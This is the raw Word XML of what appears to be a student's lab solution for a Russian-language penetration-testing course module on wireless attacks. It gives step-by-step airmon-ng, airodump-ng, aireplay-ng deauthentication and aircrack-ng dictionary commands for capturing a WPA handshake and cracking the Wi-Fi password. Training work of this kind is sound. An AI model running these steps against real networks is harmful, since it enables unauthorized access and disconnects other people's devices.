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7b7a7d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">34.6. Практика. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="7b7a7d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Модуль 34. Атаки на беспроводные сети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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="220" w:before="0" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="646464"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_12xibw44lxty" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="646464"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 34.6.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004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Course | SkillFactory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oreoda5md82g" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Решение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Выясню какие сетевые устройства имеются. Первый способ, это команда “ifconfig”, а вторая “ip a”. Необходимо выяснить название Wi-Fi карты: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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3403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Итак, wi-fi карта - “wlxd03745710fa4”.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Убираем лишние процессы, которые могут аффектить нашу атаку, используя команду sudo airmon-ng check kill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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3943350" cy="12954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Переведу Wi-Fi карту в режим монитора командой sudo airmon-ng start wlxd03745710fa4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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1041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Запускаю сканирование сетей.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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3302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MAC адрес устройства находится в столбце “BSSID”. В столбце “CH” указывается канал, в “ENC” указывается технология защиты WPA или WPA2, что и понадобится для атаки. Для атаки на выбранную Wi-Fi сеть вводим команду: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sudo airodump-ng --bssid 64:00:00:00:44:E1 --channel 1 -w ~/Documents/wifihand wlxd03745710fa4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–bssid указываем MAC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–channel канал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-w указываем путь, куда будет записан хендшейк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wlxd03745710fa4 название Wi-Fi адаптера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Выбираю устройство, которое уже подключено и заставляю его переподключиться. Что ускорит процесс получения хендшейка. Узнать какие устройства подключены можно из списка, который выводится.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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1638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 К сети подключено два устройства, для того чтобы заставить одно из них переподключиться, копируем MAC адреса из “BSSID” и “STATION”. А затем открываем новую вкладку терминала и выполняем команду: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sudo aireplay-ng –deauth 20 -a 64:00:00:00:44:E1 -с 00:00:00:00:00:7F wlxd03745710fa4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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="342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Нас интересует надпись “handshake”, которая появится при удачном переподключении устройства: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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="207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Теперь смотрим файлы в папке, которую указывали. Нам нужен всего один, в котором  храниться тот самый хендшейк, данный файл будет иметь расширение “.cap”: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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="23495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Почистим файл от лишнего.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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="6223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Теперь расшифруем Handshake, используя словари паролей для брутфорса. В Kali Linux уже присутствует один словарь и расположен он по адресу: /usr/share/wordlists/rockyou.txt.gz. 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Выполню команду “aircrack-ng -w” затем указываю путь к словарю, пишу атрибут -b и вписываю MAC адрес точки доступа, и указываю путь до очищенного хендшейка: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sudo aircrack-ng -w ~/Documents/key-list.txt -b 64:00:00:00:00:e1 ~/Documents/wifihand-01_new.cap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В результате, получу пароль от точки доступа. Пароль будет в строке “KEY FOUND!”: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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="29210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apps.skillfactory.ru/learning/course/course-v1:SKILLFACTORY+hack_pentest+2020/block-v1:SKILLFACTORY+hack_pentest+2020+type@sequential+block@514b59381839458d928c15566c08204d/block-v1:SKILLFACTORY+hack_pentest+2020+type@vertical+block@275c41bb31b744afa386ec7382f44562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